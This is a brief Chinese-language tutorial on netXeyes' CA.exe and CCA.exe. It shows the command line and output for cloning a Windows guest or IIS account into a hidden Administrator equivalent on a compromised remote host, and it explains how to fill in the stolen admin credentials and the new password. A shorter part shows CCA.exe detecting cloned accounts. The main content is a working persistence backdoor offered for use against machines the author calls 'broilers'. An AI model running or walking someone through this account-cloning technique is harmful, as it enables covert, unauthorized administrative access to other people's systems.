利用SA.exe 将Iusr_victim克隆为Administrator。
C:\ca \\192.168.0.1 test test iusr_victim password
Clone Administrator, by netXeyes 2002/04/06
Written by netXeyes 2002, dansnow@21cn.com
Connect 192.168.0.1 ....OK
Get SID of iusr_victim ....OK
Prepairing ....OK
Processing ....OK
Clean Up ....OK
这时,iusr_victim就成为了超级用户,并有具有和Administrator同样的设置(桌面、菜单等等)。
注:在ca \\192.168.0.1 test test iusr_victim password 中,
192.168.0.1是肉鸡的IP地址;第一个test是你已经得到的肉鸡上的管理员用户名,第二个test是这个用户名的密码;iusr_victim是你想克隆的帐号,最后这个password就是你想给iusr_victim用的密码。
-------------------------------------------------------
用CCA.EXE检查是否存在克隆的帐号。
不必改变ACL, 支持远程检查。
C:\cca \\192.168.0.29 administrator 123456
Check Clone Account, by netXeyes 2002/04/29
Written by netXeyes 2002, dansnow@21cn.com
Connect 192.168.0.29 ....OK
Prepairing ....OK
Processing ....OK
Checking ....
Check Result:
[DuDu] AS SAME AS [administrator]
[Guest] AS SAME AS [administrator]
[IUSR_RONG] AS SAME AS [administrator]
[IWAM_RONG] AS SAME AS [administrator]
[TEST] AS SAME AS [administrator]
[xr] AS SAME AS [administrator]
[Guest] AS SAME AS [DuDu]
[IUSR_RONG] AS SAME AS [DuDu]
这上面的DuDu,guest,IUSR_RONG等帐户就已经是被克隆为administrator啦
注意删除克隆账户是小心一定注意。我试验过很多机子删除之后administrator账户不再超管组
